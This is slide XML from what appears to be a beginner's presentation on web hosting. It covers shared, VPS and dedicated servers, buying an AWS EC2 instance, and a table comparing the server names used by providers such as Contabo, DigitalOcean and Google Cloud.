              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4300"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Shared Servers</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-501650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4300"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>VPS Servers</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-501650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4300"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Dedicated Servers</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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326"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="175225"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy a server on Amazon</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2006" name="Google Shape;2006;p326"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623625" y="857625"/>
            <a:ext cx="7990200" cy="4197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4300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> = Amazon Web Services</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>100+ Services</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We are going to use first aws service i.e EC2 (Server)</a:t>
            </a:r>
            <a:endParaRPr sz="4300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="175225"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy a server on Amazon</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2012" name="Google Shape;2012;p327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623625" y="857625"/>
            <a:ext cx="7990200" cy="41970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3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>AWS has 200+ services</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We want to work on 1st service</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I.e Today we buy a server from amazon</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You need ec2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Elastic Cloud Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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6" name="Shape 2016"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2017" name="Google Shape;2017;p328"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="175225"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy a servers from Providers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2018" name="Google Shape;2018;p328"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497375" y="1095230"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3960975"/>
                <a:gridCol w="3960975"/>
              </a:tblGrid>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Company</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:schemeClr val="accent1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Naming Convention</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:schemeClr val="accent1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Contabo</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Server</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AWS - EC2</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DigitalOCean</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Droplet</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OKLABS</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shiva</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="624850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Google</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GCP - Cloud Instance</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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329"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="319375" y="2158400"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboard/Landing Page</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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330"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1722525"/>
            <a:ext cx="8520600" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whenever we buy a server from any provider we get an IP Address</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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331"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
